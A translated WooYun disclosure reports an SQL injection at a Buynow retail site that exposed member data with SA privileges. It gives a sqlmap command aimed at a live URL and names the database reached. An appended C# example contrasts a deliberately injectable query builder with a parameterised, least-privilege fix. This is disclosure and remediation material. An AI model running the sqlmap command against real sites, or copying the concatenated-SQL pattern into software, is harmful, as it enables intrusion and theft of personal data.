
Vulnerability Summary

Defect ID: wooyun-2014-079414

Title: A vulnerability at 百脑汇 (Buynow) leaks millions of members' information (SA privileges)

Vendor: 百脑汇 (Buynow)

Author: 路人甲

Submitted: 2014-10-14 22:44

Fixed: 2014-11-28 22:46

Disclosed: 2014-11-28 22:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2014-10-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-11-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

0.0

Detailed description:

百脑汇 (Buynow)
SqlMap.exe -u "http://info.buynow.com.cn/Food/ShowDetail.aspx?id=67999&shopID=1071" -v 3
SA privileges

[Screenshots 0.png, 1.png, 3.png and 4.png from the original report are not reproduced here]


Data:
Database: cssite
OK, not going any deeper.

Proof of vulnerability:

As above~

Fix recommendation:

Filter (the input).

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively refused
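To make the one-word fix concrete, here is an added example (not code from the original report or from the vendor's site) of what an ASP.NET handler for a page like ShowDetail.aspx looks like when it concatenates the id and shopID query-string values into SQL, beside a hardened version that validates the values as integers and binds them as typed parameters. The table and column names (Food, Title, Content) are assumed for illustration; only the parameter names id and shopID come from the report.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class ShowDetail
{
    // VULNERABLE: the raw query-string values become part of the SQL text,
    // so anything an attacker appends to id or shopID is executed by SQL Server.
    // (Kept here only to show the pattern that the report's sqlmap run exploited.)
    public static string BuildVulnerableQuery(string id, string shopId)
    {
        return "SELECT Title, Content FROM Food WHERE id = " + id +
               " AND shopID = " + shopId;
    }

    // HARDENED: first reject anything that is not an integer, then pass the
    // values as typed SqlParameters so they can never be parsed as SQL.
    // "Filtering" alone is not the fix; the parameter binding is.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string id, string shopId)
    {
        if (!int.TryParse(id, out int idValue) || !int.TryParse(shopId, out int shopValue))
        {
            throw new ArgumentException("id and shopID must be integers");
        }

        var cmd = new SqlCommand(
            "SELECT Title, Content FROM Food WHERE id = @id AND shopID = @shopID", conn);
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = idValue;
        cmd.Parameters.Add("@shopID", SqlDbType.Int).Value = shopValue;
        return cmd;
    }

    // The report notes the site ran as SA. Independently of the query fix, the
    // connection string should use a login that can only read the tables this
    // page needs, so a future injection cannot reach member tables or the OS.
    // (Login name below is a placeholder, not from the report.)
    public const string LeastPrivilegeConnectionString =
        "Server=<db-host>;Database=cssite;User Id=<readonly-web-login>;Password=<secret>;";
}
```

The hardened version also removes the error-based and union-based paths that a tool like sqlmap relies on, because no user-supplied text ever reaches the query parser.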